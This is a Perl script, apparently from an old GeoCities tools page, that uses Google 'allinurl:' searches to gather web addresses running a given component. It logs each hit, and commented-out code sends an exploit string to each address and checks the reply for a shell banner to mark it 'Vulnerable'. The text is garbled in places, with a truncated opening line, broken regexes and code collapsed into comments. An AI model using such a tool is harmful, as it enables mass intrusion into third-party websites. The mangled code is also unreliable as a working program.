#!/usr/bin/perl

use Socket;

$bosencekingjelek=<;
close(hf);
$check=1;#Check if any save session
$nomer=1;
$counter=0;
while(1)
{
$googleurl="http://www.google.com/search?q=allinurl:$komponen&num=10&hl=en&lr=&ie=UTF-8&oe=utf-8&start=$counter&sa=N";
$httppost="GET $googleurl HTTP/1.0\r\n\r\n";
@results=sendraw($httppost);
$data = join("",@results);
$counter=$counter+10;

exit if ($data=~/Google does not serve more than 1000/); #End Google search or Stop

@tmp=split(/\

\/,$tmp[$a]); @t=split(/\/mod/,$u[0]); $url=$t[0]; if (($lastsav ne "") && (!($lastsav =~ /$url/)) && $check) { next; } else { $check=0; } #Save Session open(hf,">$fsav"); print hf $url; close(hf); printlog("$nomer. http://$url\t"); $nomer++; # $urltarget="$url$exp"; # $urltarget=~s/ /%20/g; # $httppost="GET http://$urltarget HTTP/1.0\r\n\r\n"; # @results=sendraw($httppost); # $strhasil = join("",@results); #Verify output #print $strhasil; # if (!($strhasil=~/Security Corp/)) # { # printlog("Not Vulnerable\n"); # next; # } #Verify if any shell banner # @atmp=split(/\\\r\n/,$strhasil); # @atmp=split(/\<\/font\>\<\/pre\>/,$atmp[1]); # $banner=$atmp[0]; # $banner=~s/\n/\r\n/g; # $p=length($banner); # if ($p>0) # { # printlog("Vulnerable\n"); # printlog("$banner\n"); # } # else # { # printlog("Possible-Vulnerable\n"); # } printlog("\n"); } } #exit while exit; # ------------- Sendraw - thanx RFP rfp@wiretrip.net sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(){ push @in, $_;} select(STDOUT); close(S); return @in; } } sub printlog { print @_[0]; open(lo,">>$log"); print lo @_[0]; close(lo); return; }

    Source: geocities.com/iko94/tools

               ( geocities.com/iko94)